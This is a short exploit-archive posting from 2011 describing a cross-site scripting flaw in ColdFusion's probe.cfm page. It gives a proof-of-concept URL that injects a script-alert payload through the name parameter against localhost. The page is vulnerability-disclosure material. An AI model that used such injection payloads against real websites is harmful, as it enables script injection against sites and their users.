Home / exploitsPDF  

ColdFusion probe.cfm Cross Site Scripting

Posted on 19 August 2011

*Describe£º*ColdFusion probe.cfm page local parameter can xss

*CVE£º*Unknow

*PoC£º*

http://127.0.0.1/CFIDE/probe.cfm?name=<script>alert("G.R0b1n")</script>
URL.Name parameter can xss only local.

Or visit:
http://www.focusecurity.org/2011/08/ColdFusion-Local-Parameter-Xss-Exploit.html

 

TOP

Malware :

Exploits :